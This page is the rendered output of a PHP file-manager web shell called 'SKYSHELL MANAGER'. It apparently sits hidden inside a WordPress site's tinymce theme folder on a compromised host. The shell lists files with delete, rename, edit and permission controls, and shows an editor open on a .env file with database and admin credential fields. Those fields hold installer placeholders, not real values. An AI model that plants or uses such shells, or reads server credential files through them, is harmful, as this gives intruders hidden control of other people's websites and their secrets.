📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: .env
# For a complete list of core environment variables see # https://docs.silverstripe.org/en/getting_started/environment_management/#core-environment-variables # DB credentials SS_DATABASE_CLASS="MySQLDatabase" SS_DATABASE_SERVER="[[softdbhost]]" SS_DATABASE_USERNAME="[[softdbuser]]" SS_DATABASE_PASSWORD="[[softdbpass]]" SS_DATABASE_NAME="[[softdb]]" SS_DEFAULT_ADMIN_USERNAME="[[admin_email]]" SS_DEFAULT_ADMIN_PASSWORD="[[admin_pass_plain]]" # WARNING: in a live environment, change this to "live" instead of dev SS_ENVIRONMENT_TYPE="live"
Save